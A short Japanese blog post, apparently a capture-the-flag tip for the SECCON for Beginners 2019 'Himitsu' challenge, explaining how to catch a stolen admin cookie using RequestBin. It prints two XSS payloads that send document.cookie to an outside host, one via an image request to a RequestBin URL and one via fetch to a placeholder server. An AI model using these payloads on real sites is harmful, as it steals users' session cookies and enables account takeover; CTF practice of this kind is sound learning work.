【XSS】CTFでcookieを自サーバに送る問題
//
前置き
SECCON for Beginners ctf 2019
で、Himitsu
という問題が出題されました。とりあえず、そのWrite-up
に関しては他の方のを参考にしてください。
で、この問題管理人のcookie
を奪うために、XSS
でcookie
を自分のサーバに送ってもらう処理を書かなければいけないのですが、あいにく自分のサーバを立てていないので壁にぶつかります。その時の解決法書きます。
RequestBin
このサイトです。
このサイトはリクエストを受け取れる場所を生成し、その内容を見ることができます。API
を試し打ちしてみるなどの用途がありそうです。で、ここにアクセスする際にパラメータにcookie
を含めるよう設定したらOKです。
<script>(new Image).src='http://requestbin.fullcontact.com/xxxxxxx?'+document.cookie</script>
あくまでHTTP
のサイトなので、HTTPS
からのリクエスト出せなさそう?下のスクリプトはエラーでリクエストが飛びません。
<script>fetch('http://<my_server>/?'+document.cookie)</script>
他にも色々やり方はあると思います。が、知識不足なので例があげられませんごめんなさい。